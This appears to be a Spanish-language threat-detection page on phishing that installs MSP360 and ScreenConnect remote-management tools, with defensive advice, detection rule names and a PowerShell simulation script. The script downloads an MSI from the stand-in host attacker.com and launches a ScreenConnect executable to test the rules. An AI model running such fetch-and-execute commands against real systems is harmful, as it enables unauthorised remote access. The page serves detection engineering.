El phishing abusa de herramientas RMM para acceso persistente
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están aprovechando campañas de phishing para entregar un instalador legítimo de MSP360 RMM disfrazado como software de confianza. Una vez lanzado, el instalador establece persistencia y, posteriormente, descarga e implementa ConnectWise ScreenConnect, proporcionando a los atacantes un canal adicional de acceso remoto. Esto permite actividades posteriores al compromiso, incluyendo el robo de credenciales y la recopilación de datos sensibles.
Investigación
Los expertos de Microsoft Defender identificaron múltiples señuelos de phishing que se hacían pasar por Zoom, Adobe e invitaciones a reuniones legítimas para distribuir MSP360 v2.5.0.67. Los investigadores reconstruyeron la cadena de infección, rastreando la ejecución inicial del usuario y la elevación de UAC mediante la instalación de servicios y el despliegue de herramientas RMM secundarias. La investigación también reveló que los atacantes abusan de plataformas en la nube de confianza, incluyendo Amazon S3 y Dropbox, para alojar cargas maliciosas.
Mitigación
Las organizaciones deberían controlar estrictamente las herramientas RMM aprobadas aplicando MFA e implementando políticas de Control de Aplicaciones para prevenir instalaciones no autorizadas. Las reglas de bloqueo basadas en certificados pueden restringir aún más aplicaciones específicas firmadas. Fortalecer las defensas de los endpoints mediante protección antivirus en la nube y reglas de Reducción de Superficie de Ataque es también esencial para reducir la exposición.
Respuesta
Cuando se descubran instalaciones no autorizadas de RMM, los equipos de seguridad deben restablecer inmediatamente las credenciales asociadas con las instalaciones de servicios afectados. La sospecha de compromiso de cuentas a nivel de sistema requiere una investigación exhaustiva para determinar el alcance total del ataque. Revisar los registros de detección de endpoints para identificar sesiones de gestión remota sospechosas y actividades relacionadas posteriores al compromiso.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Descarga o Subida a través de Powershell (vía cmdline)
Ejecución de Cambio Inusual de Código de Página (vía cmdline)
Software Alternativo de Acceso/Administración Remota (vía process_creation)
Llamar Métodos Sospechosos de .NET desde Powershell (vía powershell)
Comando y Control Sospechoso por Solicitud de Dominio de Nivel Superior (TLD) Inusual DNS (vía dns)
IOCs (HashSha256) para detectar: El Phishing Abusa de Herramientas RMM para Acceso Persistente
IOCs (HashSha1) para detectar: El Phishing Abusa de Herramientas RMM para Acceso Persistente
Detectar PowerShell Invoke-WebRequest para Descarga de Paquete MSI Remoto [Windows Powershell]
El Phishing Abusa de Herramientas RMM para Acceso Persistente [Windows Process Creation]
Ejecución de Simulación
-
Narrativa del Ataque & Comandos: Un adversario inicia una campaña de spearphishing. La víctima hace clic en un enlace que desencadena un comando PowerShell de una sola línea. Este comando usa
Invoke-WebRequestpara descargarClientSetup.msi(simulando el instalador de ScreenConnect) desde un servidor remoto. Una vez descargado, el atacante ejecuta el MSI, y el paso final de la simulación implica lanzarScreenConnect.WindowsClient.exepara imitar la sesión de acceso remoto establecida. Esta secuencia está diseñada para activar laselección_2 Y selección_3lógica de la regla. -
Script de Prueba de Regresión:
# Simulación de Despliegue RMM basado en Phishing $tempDir = $env:TEMP $msiName = "ClientSetup.msi" $exeName = "ScreenConnect.WindowsClient.exe" $msiPath = Join-Path $tempDir $msiName $exePath = Join-Path $tempDir $exeName # 1. Simular la Descarga de PowerShell (Parte A de la Selección 2) Write-Host "[+] Simulando descarga de MSI..." # Usando un archivo ficticio para simular la descarga del MSI New-Item -Path $msiPath -ItemType File -Force # Este comando coincide con la lógica de 'Invoke-WebRequest' y 'ClientSetup.msi' powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'" # 2. Crear un ejecutable ficticio para simular el cliente de ScreenConnect (Selección 3) Write-Host "[+] Creando ejecutable ficticio de ScreenConnect..." New-Item -Path $exePath -ItemType File -Force # 3. Ejecutar el cliente (Selección 3 y finalización de la Selección 2) Write-Host "[+] Ejecutando Cliente ScreenConnect..." Start-Process -FilePath $exePath -
Comandos de Limpieza:
# Limpiar artefactos de la simulación Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue Write-Host "[+] Limpieza completa."